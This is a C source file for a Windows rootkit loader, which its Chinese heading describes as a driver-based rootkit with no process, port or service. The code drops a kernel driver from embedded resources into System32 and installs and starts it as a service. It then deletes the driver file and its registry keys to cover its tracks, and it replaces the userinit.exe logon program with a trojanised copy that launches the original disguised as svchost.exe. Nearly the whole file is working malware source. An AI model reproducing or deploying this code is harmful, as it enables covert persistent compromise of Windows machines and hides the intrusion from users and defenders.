u_userinit.c

一个驱动上实现 无进程 无端口 无服务的简单rootkit

#include <stdio.h>
#include <windows.h>
#include <errno.h>
#include <SYS\STAT.H>

int ReleAseTheSys(void);
int LoAdSys(void);
int DeleteSysKey(void);

int
ReleAseTheUserinit(
	char* ReleAseWhere //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
	);

int
RunUserinitThenDeleteIt(
	char* where //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
	//must be the sAme As ReleAseTheUserinit's
	);

struct	_MODIFY_DATA{
	unsigned int finder;
	unsigned int file_length;
}modify_dAtA = {0x12345678,0};//modified by Another exe,when finded 0x12345678

int WINAPI 
WinMain(
	HINSTANCE hInstAnce,  // handle to current instance
	HINSTANCE hPrevInstAnce,  // handle to previous instance
	LPSTR lpCmdLine,      // pointer to command line
	int nCmdShow          // show state of window
	)
{
	char	syspAth[MAX_PATH+1];
	char	userinitpAth[MAX_PATH+1];

	//驱动部分
	ReleAseTheSys();
	LoAdSys();
	//delete the sys,reg.
	GetSystemDirectory(syspAth,MAX_PATH);
	strcat(syspAth,"\\uay.sys");
	DeleteFile(syspAth);
	printf("DeleteFile: %d\n",GetLastError());
	DeleteSysKey();
	

	//userinit.exe部分
	GetWindowsDirectory(userinitpAth,MAX_PATH);
	strcat(userinitpAth,"\\svchost.exe");
	ReleAseTheUserinit(userinitpAth);
	RunUserinitThenDeleteIt(userinitpAth);
	return 0;
	
}
//--------------------------------------------------------------------
int ReleAseTheSys(void)
{
	HRSRC	hRes = NULL;
	DWORD	dwResSize = 0;
	HGLOBAL	hResource = NULL;
	LPVOID	lpfResource = NULL;
	HANDLE	hFile = NULL;
	char	SystemDir[128];//i think it's enough
	DWORD	dwWritten;
	DWORD	result;

	hRes = FindResource(NULL,"uay","sys");
	if (hRes == NULL) {
		return -1;
	}
	dwResSize = SizeofResource(NULL,hRes);
	if (dwResSize == 0) {
		return -1;
	}
	hResource = LoadResource(NULL,hRes);
	if (hResource == NULL){
		return -1;
	}
	lpfResource = LockResource(hResource);
	if (lpfResource == NULL) {
		return -1;
	}
	GetSystemDirectory(SystemDir,128);
	strcat(SystemDir,"\\uay.sys");

	hFile = CreateFile(SystemDir,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
	if (hFile == NULL){
		return -1;
	}
	result = WriteFile(hFile,lpfResource,dwResSize,&dwWritten,NULL);

	if (result == 0){
		return -1;
	}
	CloseHandle(hFile);

	return 0;
}
//--------------------------------------------------------------------
int LoAdSys(void)
{
	//创建服务,加载驱动
	SC_HANDLE hSCHAndle;
	SC_HANDLE hSCMAnAger;

	char	systemdir[MAX_PATH+1];
	char	pAth[MAX_PATH+1];
	GetSystemDirectory(systemdir,MAX_PATH);
	sprintf(pAth,"%s\\%s",systemdir,"uay.sys");

	hSCMAnAger = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);

	//remove old instAnces
	hSCHAndle = OpenService(hSCMAnAger,
							"uay.sys",
							SERVICE_ALL_ACCESS
							);
	if (hSCHAndle == NULL){
		//throw
		//return -1;
	}
	DeleteService(hSCHAndle);
	CloseServiceHandle(hSCHAndle);

	//ignore success of instAllAtion:it mAy AlreAdy be instAlled
	hSCHAndle = CreateService(
					hSCMAnAger,
					"uay.sys",
					"uay.sys",
					SERVICE_ALL_ACCESS,
					SERVICE_KERNEL_DRIVER,
					SERVICE_DEMAND_START,
					SERVICE_ERROR_NORMAL,
					pAth,
					NULL,
					NULL,
					NULL,
					NULL,
					NULL
					);
	if (hSCHAndle == NULL){
		printf("CreAteService error: %d\n",GetLastError());
		//return -1;
	}
	CloseServiceHandle(hSCHAndle);

	//ignore success of stArt: it mAy ALreAdy be stAarted
	hSCHAndle = OpenService(hSCMAnAger,
							"uay.sys",
							SERVICE_ALL_ACCESS
							);
	if (hSCHAndle == NULL){
		printf("OpenService error: %d\n",GetLastError());
		//return -1;
	}
	StartService(hSCHAndle,0,NULL);
	printf("stArtService %d\n",GetLastError());
	CloseServiceHandle(hSCHAndle);

	CloseServiceHandle(hSCMAnAger);
	return 0;
}
//--------------------------------------------------------------------
int
ReleAseTheUserinit(
	char* ReleAseWhere //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
	)
{
	FILE*	pMyself		= NULL;
	FILE*	pUserinit	= NULL;

	char*	buff;
	DWORD	length;

	struct _stat ST;
	char	pAth_userinit[MAX_PATH+1];

	GetSystemDirectory(pAth_userinit,MAX_PATH);
	strcat(pAth_userinit,"\\userinit.exe");
	_stat(pAth_userinit,&ST);
	pMyself = fopen(pAth_userinit,"rb");
	if(pMyself == NULL){
		printf("open file fAiled\n");
		return -1;
	}
	pUserinit = fopen(ReleAseWhere,"wb");
	if(pUserinit == NULL){
		printf("creAte file fAiled\n");
		return -1;
	}
	fseek(pMyself,modify_dAtA.file_length,SEEK_SET);
	length = ST.st_size - modify_dAtA.file_length ;

	printf("length: %d\n",length);///debug
	buff = malloc(length);
	fread(buff,length,1,pMyself);
	fwrite(buff,length,1,pUserinit);
	free(buff);
	fclose(pMyself);
	fclose(pUserinit);
	return 0;
}
//--------------------------------------------------------------------
int
RunUserinitThenDeleteIt(
	char* where //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
	//must be the sAme As ReleAseTheUserinit's
	)
{
	PROCESS_INFORMATION		pi={0};
	STARTUPINFO				si={sizeof(STARTUPINFO)};

	CreateProcess(
		where,//"C:\\WINDOWS\\System32\\temp_userinit.exe",
		NULL,
		NULL,
		NULL,
		FALSE,
		0,
		NULL,
		NULL,
		&si,
		&pi
		);
	//printf("CreAteProcess: %d\n",GetLastError());
	WaitForSingleObject(
		pi.hProcess,
		INFINITE
		);	
	DeleteFile(where);
	return 0;
}
//--------------------------------------------------------------------
int DeleteSysKey(void)
{
	RegDeleteKey(
		HKEY_LOCAL_MACHINE,
		"SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Enum"
		);
	printf("RegDeleteKey: %d\n",GetLastError());
	RegDeleteKey(
		HKEY_LOCAL_MACHINE,
		"SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
		);
	printf("RegDeleteKey: %d\n",GetLastError());
	RegDeleteKey(
		HKEY_LOCAL_MACHINE,
		"SYSTEM\\CurrentControlSet\\Services\\uay.sys"
		);
	printf("RegDeleteKey: %d\n",GetLastError());
	return 0;
}
//--------------------------------------------------------------------